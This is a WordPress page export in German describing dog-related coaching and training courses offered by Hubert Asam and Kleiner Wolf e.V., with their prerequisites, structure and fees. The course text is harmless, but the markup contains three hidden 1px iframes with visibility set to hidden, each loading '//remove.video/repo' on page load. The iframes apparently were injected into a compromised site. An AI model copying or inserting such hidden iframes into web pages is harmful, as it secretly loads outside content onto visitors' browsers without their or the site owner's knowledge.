{"id":1817,"date":"2015-07-20T12:40:03","date_gmt":"2015-07-20T10:40:03","guid":{"rendered":"http:\/\/www.hubert-asam.de\/?page_id=1817"},"modified":"2021-12-19T09:34:52","modified_gmt":"2021-12-19T08:34:52","slug":"ausbildungen","status":"publish","type":"page","link":"https:\/\/www.hubert-asam.de\/?page_id=1817","title":{"rendered":"Ausbildungen"},"content":{"rendered":"<p>[et_pb_section][et_pb_row][et_pb_column type=&#8220;1_2&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; background_color=&#8220;#ffffff&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]<\/p>\n<h3><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h3>\n<h3>1\u00a0Semester Coaching \/ Pers\u00f6nlichkeitsentwicklung mit Hubert Asam<\/h3>\n<p>Als Entwicklungsbegleitung f\u00fcr den Hund bekommt bei diesem Coaching der Mensch die M\u00f6glichkeit, sich innerhalb der Natur weiterzubilden und zu lernen. Ein Angebot an die, die die Entwicklung ihres Hundes\u00a0 professionell begleitet sehen wollen.<\/p>\n<p>Dieses Angebot richtet sich auch an Menschen, die beruflich im Personalmanagement, Coaching oder Lehrbereich oder als Student t\u00e4tig sind und \u00fcber ein Tier verf\u00fcgen, an dem die eigene Entwicklung sichtbar gemacht wird.<\/p>\n<p>Zudem ist dieses intensive Semester mit Hubert Asam eine gute Grundlage, um im Anschluss die Basisausbildung bei Kleiner Wolf zu beginnen, denn vieles kl\u00e4rt sich in diesem Semester und wir sehen oft, dass der Wunsch w\u00e4chst, tiefer in die Arbeit einzusteigen. Ist dies der Fall, kann ein Teil der Kosten f\u00fcr die Ausbildung angerechnet werden.<\/p>\n<h3><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h3>\n<p>Ziel der Entwicklungsarbeit ist, f\u00fcr sich selbst die Komplexit\u00e4t des Themas \u201eKommunikation mit sozialen Tieren\u201c zu erfassen und deren Einordnung in nat\u00fcrliche Vorg\u00e4nge und Rhythmen vornehmen zu k\u00f6nnen.<\/p>\n<p>Die Entwicklung des Tieres gibt dabei die Themen vor. Der Verhaltenskodex eines Tieres soll verstanden sein, die Vermittlung \u00fcber K\u00f6rpersprache, RangOrdnung\/Beziehung m\u00f6glich sein.<\/p>\n<h3>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h3>\n<p>Ziel ist auch, sich der Bedeutung des eigenen Handelns in archaischen Ebenen bewusst zu werden und von menschlich kulturellen Vereinbarungen unabh\u00e4ngig zu werden.<\/p>\n<p>Ziel ist es, die Vogelperspektive zu erhalten, die einem die \u00dcbersicht \u00fcber \u201eecological web\u201c (es gibt leider keinen guten deutschen Ausdruck daf\u00fcr) verschafft.<\/p>\n<p>Nach einem\u00a0Semester sollte es m\u00f6glich sein, sein eigenes Tun im \u201eNetz\u201c zu verorten und sich danach zu orientieren, was die \u00f6kologische Situation erfordert.<\/p>\n<h3><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h3>\n<p>Sich erwachsen, reif und klug zu differenzieren und auch die Antriebe und Hintergr\u00fcnde menschlichen und tierischen Verstehens und Handelns zu kennen, zu begreifen und vor allem zu akzeptieren ist eine Kunst, die erlernt werden will. Alles wirkt im Tier, wir m\u00fcssen es lernen zu lesen und zu verstehen.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<p>Wer mit Natur in Kontakt geht und seine menschliche Seite aufgibt, muss sich der Natur und ihren Gesetzen dem\u00fctig und der Menschenkultur und ihren Gesetzen kritisch, aber sozial zeigen. Ein \u00f6kologisch vernetzter Mensch kann kreativ und intuitiv in Situationen handeln, die sozial relevant sind, unabh\u00e4ngig davon, in welcher Ebene die Situation scheinbar stattfindet.<\/p>\n<p>Ein \u00f6kologisch vernetzter Mensch kennt sich selbst und kann seine Umwelt einordnen, ohne sie zu verurteilen und zu bewerten.<\/p>\n<p>Nat\u00fcrlich ist ein solcher Prozess lebenslang, nat\u00fcrlich ist er niemals beendet \u2013 ein Coaching-Semester\u00a0zur Pers\u00f6nlichkeitsentwicklung soll der erste gro\u00dfe Schritt in Richtung Menschreife und Verbundenheit mit der Natur sein.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Bild-f\u00fcr-Jahrescoaching.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4321\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Bild-f\u00fcr-Jahrescoaching-300x182.png\" alt=\"Bild f\u00fcr Jahrescoaching\" width=\"300\" height=\"182\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Bild-f\u00fcr-Jahrescoaching-300x182.png 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Bild-f\u00fcr-Jahrescoaching-768x465.png 768w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Bild-f\u00fcr-Jahrescoaching-1024x620.png 1024w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Bild-f\u00fcr-Jahrescoaching.png 1074w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<h4><strong>Voraussetzung<\/strong><\/h4>\n<p>Du hast ein Eignungsgespr\u00e4ch mit uns gef\u00fchrt und eine Empfehlung erhalten. Du bringst die Bereitschaft mit, dich zu entwickeln und zu lernen. Du bist bereit, f\u00fcr das\u00a0Semester gemeinsam mit Hubert Asam eine Zielsetzung f\u00fcr das\u00a0Semester zu erstellen.<\/p>\n<h3><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h3>\n<h4><strong>Dauer und Aufbau der Ausbildung<\/strong><\/h4>\n<p>Das Angebot dauert 6 Monate.<\/p>\n<p>Das Coaching-Semester beinhaltet:<\/p>\n<ul>\n<li>Eingangs- und Abschlussgespr\u00e4ch mit Hubert Asam<\/li>\n<li>Teilnahme an allen von Hubert Asam durchgef\u00fchrten Angebotsformaten (ausgeschlossen sind die Veranstaltungen im Rahmen der Ausbildungen bei Kleiner Wolf e.V.)<\/li>\n<li>Teilnahme an den w\u00f6chentlichen Online-Meetings von Kleiner Wolf e.V. (Fallbesprechung und Videoanalyse)<\/li>\n<li>Pers\u00f6nliche Standortbesprechung und Videoanalyse alle 3 Wochen ca. 60 Minuten<\/li>\n<li>2 Quartalsbesprechungen ca. 90 Minuten<\/li>\n<li>Soviel Einzelunterricht wie n\u00f6tig (und in Pandemiezeiten m\u00f6glich)<\/li>\n<li>Die M\u00f6glichkeit, jederzeit Fragen zu stellen und zu reflektieren<\/li>\n<\/ul>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<h4><strong>Kosten<\/strong><\/h4>\n<p>3.000 EUR<\/p>\n<p>Zahlbar in einem Betrag<\/p>\n<p>Oder 525 EUR pro Monat \u00fcber\u00a06 Monate<\/p>\n<p>Entwicklungsarbeit ist f\u00fcr jeden interessante Lernzeit, besonders aber f\u00fcr Menschen die in unterrichtenden, helfenden, medizinischen, coachenden Berufen oder in Personalf\u00fchrung, Managementpositionen sind.<br \/>\nIch nehme auch Menschen, die in Hundeschulen arbeiten, verlange aber eine 100%ige Umstellung auf artgerechten Umgang.<br \/>\nDie\u00a0 Entwicklungsarbeit ist jedoch nicht f\u00fcr therapeutische Zwecke gedacht.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2017\/03\/Vorbereitungsbogen.pdf\">Vorbereitungsbogen<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Anmeldeformular-2022-1.pdf\">Anmeldeformular 2022<\/a><br \/>\n<iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/p>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<p>[\/et_pb_text][\/et_pb_column][et_pb_column type=&#8220;1_2&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264 alignleft\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<h3><\/h3>\n<h3><\/h3>\n<h3>Ausbildung Basis 1<\/h3>\n<p><strong>Zielgruppe<\/strong><\/p>\n<p>Unsere Ausbildung Basis 1 ist f\u00fcr Menschen, die in \u00f6kologisches Denken und artgerechten Umgang mit ihrem Hund tiefer einsteigen wollen; die nicht nur wissen m\u00f6chten, was sie tun sollen, um mit ihrem Tier zurecht zu kommen, sondern die sich auch f\u00fcr die Zusammenh\u00e4nge interessieren, wie Tiere kommunizieren, wie eine artgerechte, auf Instinkt und Archaik basierte Beziehung aussieht, wie diese in die Natur eingebettet ist. Sie ist f\u00fcr Menschen gedacht, die den eigenen kleinen Wolf kennenlernen und sich auch um ihn k\u00fcmmern wollen.<\/p>\n<p>Nur wir Menschen k\u00f6nnen in der Beziehung zum Tier den verantwortlichen Schritt unternehmen und verstehen, was auf beiden Seiten vor sich geht und was soziales Leben bedeutet.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/R7J9871.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2136\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/R7J9871-300x200.jpg\" alt=\"_R7J9871\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/R7J9871-300x200.jpg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/R7J9871-1024x684.jpg 1024w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/R7J9871-1080x721.jpg 1080w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/R7J9871.jpg 1200w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<h4><strong>Voraussetzung<\/strong><\/h4>\n<p>Du hast ein Basis\u2013 und Beziehungsseminar mit deinem Hund bei Kleiner Wolf e.V. abgeschlossen und bist bereit, dich auf vertiefende Arbeit einzulassen. Zus\u00e4tzlich hast du ein Eignungsgespr\u00e4ch mit uns gef\u00fchrt und eine Empfehlung erhalten.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<h4><strong>Dauer und Aufbau der Ausbildung<\/strong><\/h4>\n<p>Die Ausbildung umfasst 2 Jahre \/ 4 Semester.<\/p>\n<p>Theorie und Praxis stehen in dieser Zeit in einem ausgewogenen Verh\u00e4ltnis. Es gibt regelm\u00e4\u00dfige Online-Veranstaltungen zu Fallbesprechungen und Videoanalyse. Die Online-Veranstaltungen werden aufgezeichnet. Solltest du es einmal nicht schaffen, \u201elive\u201c dabei zu sein ist das kein Problem &#8211; schau dir die Veranstaltung einfach im Nachgang auf der Cloud an.<\/p>\n<p>Zus\u00e4tzlich zu den Ausbildungsmodulen werden themenspezifische Seminare und Seminarwochen angeboten, die von Kleiner Wolf-Azubis alle kostenfrei besucht werden k\u00f6nnen (Kosten f\u00fcr Unterkunft und Verpflegung fallen zus\u00e4tzlich an). Folgende Seminare m\u00fcssen w\u00e4hrend der gesamten Ausbildung mindestens 1 x besucht werden:<\/p>\n<p>F\u00e4hrtenseminar<\/p>\n<p>Seminar Pferd &amp; Hund<\/p>\n<p>H\u00fcteseminar<\/p>\n<p>Urlaub mit dem Hund<\/p>\n<p>Zum Erlernen der praktischen Arbeit und des theoretischen Hintergrunds kommt die Ebene der Eigenreflektion hinzu.\u00a0Ein weiterer Baustein\u00a0der Ausbildung\u00a0ist die Hospitation bei erfahrenen Kleinen W\u00f6lfen. Die Hospitationszeit betr\u00e4gt ca. 12 Stunden pro Jahr.\u00a0Danach gehen wir in die Ebene, in der die Muster der Klienten und der Tiere der Klienten (die ja wiederum vom Sozialpartner abh\u00e4ngen) erkannt, gedeutet und behandelt werden k\u00f6nnen.<\/p>\n<p>Neben deinen Ausbildern steht dir ein erfahrener Kleiner Wolf Mentor w\u00e4hrend deiner gesamten Ausbildung zur Seite. Regelm\u00e4\u00dfige Treffen an unterschiedlichen Orten untereinander und mit Mentoren sind elementarer Teil der Ausbildung und festigen das Erlernte.<\/p>\n<p>Wer eine Ausbildung bei kleiner Wolf gemacht hat, kann, solange er es m\u00f6chte, Teil des Netzwerkes sein. Gezwungen wird dazu niemand, es gibt auch keine dogmatischen Vorgaben, au\u00dfer, dass die Regeln der Natur vor den Regeln der Menschen gelten.<\/p>\n<h3><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h3>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Hubert-und-Hund-am-See.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4322\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Hubert-und-Hund-am-See-300x199.png\" alt=\"Hubert und Hund am See\" width=\"300\" height=\"199\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Hubert-und-Hund-am-See-300x199.png 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Hubert-und-Hund-am-See-768x509.png 768w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Hubert-und-Hund-am-See.png 981w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h4><strong>Kosten<\/strong><\/h4>\n<p>10.000 EUR<\/p>\n<p>Zahlbar in einem Betrag<\/p>\n<p>Die Kosten k\u00f6nnen auch in Raten bzw. monatlich bezahlt werden.<br \/>\n\u00dcblich ist eine Anzahlung von 50%.<\/p>\n<p>Zus\u00e4tzliche Kosten entstehen nur in Form von Reisekosten, \u00dcbernachtungskosten oder wenn Seminare von Externen gef\u00fchrt werden, dann m\u00fcssen die Kosten des Externen anteilsm\u00e4\u00dfig \u00fcbernommen werden.<\/p>\n<h3><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/h3>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2017\/03\/Vorbereitungsbogen.pdf\">Vorbereitungsbogen<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" rel=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/anmeldeformular-kleiner-wolf.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1677 size-full\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Anmeldeformular-2022-1.pdf\">Anmeldeformular 2022<\/a><\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1629\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/wasser-300x201.jpg\" alt=\"wasser\" width=\"300\" height=\"201\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/wasser-300x201.jpg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/wasser-1024x685.jpg 1024w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/wasser-1080x723.jpg 1080w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/wasser.jpg 1200w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>&nbsp;<\/p>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row][et_pb_column type=&#8220;4_4&#8243;][\/et_pb_column][\/et_pb_row][et_pb_row][et_pb_column type=&#8220;1_2&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264 alignleft\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Ausbildung Basis 2<\/h3>\n<h4><strong>Zielgruppe<\/strong><\/h4>\n<p>Wenn du planst, nach dem Ende deiner Ausbildung dein erworbenes Wissen und deine Erfahrung unter dem Dach von Kleiner Wolf e.V. weiterzugeben, lernst du in dieser Aufbau-Ausbildung das Unterrichten in Theorie und Praxis. \u00dcbrigens hast du 2 M\u00f6glichkeiten, mit Kleiner Wolf e.V. zu unterrichten: Als freier Lizenznehmer oder im Netzwerk Kleiner Wolf e.V. Komm f\u00fcr mehr Informationen hierzu gern auf uns zu!<\/p>\n<p>Diese Ausbildung richtet sich an Menschen, die selbst nach den Gesetzen der Natur unterrichten wollen.<br \/>\nSie richtet sich an Menschen, die in Trainer &#8211; Coaching &#8211; Personal-f\u00fchrungsberufen t\u00e4tig sind.<br \/>\nNat\u00fcrlich richtet sie sich auch an Hundetrainer, die ihr Metier beherrschen wollen, an alle, die mit Tieren beruflich oder als Passion zu tun haben. Zudem an alle, die in Fachbereichen der P\u00e4dagogik oder Psychologie arbeiten oder arbeiten wollen.<br \/>\nAn zuk\u00fcnftige Ethop\u00e4dagogen.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2015\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/00000022-300x199.jpg\" alt=\"00000022\" width=\"300\" height=\"199\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/00000022-300x199.jpg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/00000022.jpg 734w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h4><strong>Voraussetzung<\/strong><\/h4>\n<p>Du hast die Ausbildung Basis 1 mit deinem Hund bei Kleiner Wolf e.V. erfolgreich abgeschlossen. Zus\u00e4tzlich hast du ein Eignungsgespr\u00e4ch mit uns gef\u00fchrt und eine Empfehlung erhalten.<\/p>\n<h4><strong>Dauer und Aufbau der Ausbildung<\/strong><\/h4>\n<p>In der Regel dauert die Ausbildung 3-4 Monate.<\/p>\n<p>2 Theoriemodule mit vielen praktischen \u00dcbungen sowie das Unterrichten als Co-Leitung (14 Stunden) und anschlie\u00dfend als Leitung (5 Stunden) unter Supervision (mit anschlie\u00dfenden Feedback-\/Supervisionsgespr\u00e4chen) geben dir das R\u00fcstzeug, das Wissen und die Philosophie von Kleiner Wolf sicher weiterzugeben.<\/p>\n<h4><strong>Kosten<\/strong><\/h4>\n<p>2.400 EUR<\/p>\n<p>Zahlbar in einem Betrag<\/p>\n<p>Oder 620 EUR pro Monat \u00fcber 4 Monate<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2017\/03\/Vorbereitungsbogen.pdf\">Vorbereitungsbogen<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Anmeldeformular-2022-1.pdf\">Anmeldeformular 2022<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>[\/et_pb_text][\/et_pb_column][et_pb_column type=&#8220;1_2&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264 alignleft\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Weiterbildung zum Ausbilder<\/h3>\n<h4><strong>Zielgruppe<\/strong><\/h4>\n<p>Wenn du nach deiner Ausbildung Basis 1 in der Akademie von Kleiner Wolf e.V. aktiv werden und Auszubildende theoretisch und praktisch unterrichten m\u00f6chtest, dann bist du in dieser Ausbildung genau richtig. Du kannst mit dieser Ausbildung (bezahlte) Co-Leitungen und Leitungen von offenen Angeboten der Akademie \u00fcbernehmen. Die Ausbildung zum Ausbilder ist zudem Voraussetzung f\u00fcr die Master-Ausbildung.<\/p>\n<h4><strong>Voraussetzung<\/strong><\/h4>\n<p>Du hast die Ausbildung Basis 1 mit deinem Hund bei Kleiner Wolf e.V. erfolgreich abgeschlossen. Zus\u00e4tzlich hast du ein Eignungsgespr\u00e4ch mit uns gef\u00fchrt und eine Empfehlung erhalten.<\/p>\n<h4><strong>Dauer und Aufbau der Ausbildung<\/strong><\/h4>\n<p>In der Regel dauert die Ausbildung 6 Monate.<\/p>\n<p>Die 6 Module dieser Ausbildung vereinen Theorie und Praxis in ausgewogener Form und professionalisieren dich f\u00fcr den Einsatz in der Akademie und im Ausbildungs-programm von Kleiner Wolf e.V.<\/p>\n<p>Der praktische Teil deiner Ausbildung besteht aus 14 Stunden Co-Leitung einer Gruppe und 5 Stunden Leitung einer Gruppe unter Supervision mit anschlie\u00dfenden Feedback-\/Supervisionsgespr\u00e4chen. Zudem wirst du zusammen mit einem Mit-Azubi dieser Ausbildung ein Basis 1 &#8211; Azubi-Wochenende vorbereiten und durchf\u00fchren. Am Ende deiner Ausbildung wirst du als Co-Leitung eine Basis 1 &#8211; Azubi-Woche vorbereiten und durchf\u00fchren. Nach Ende der Ausbildung gibt es regelm\u00e4\u00dfige Supervisionsangebote.<\/p>\n<h4><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3722\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2018\/10\/steingaden3-300x200.jpg\" alt=\"steingaden3\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2018\/10\/steingaden3-300x200.jpg 300w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2018\/10\/steingaden3-768x512.jpg 768w, 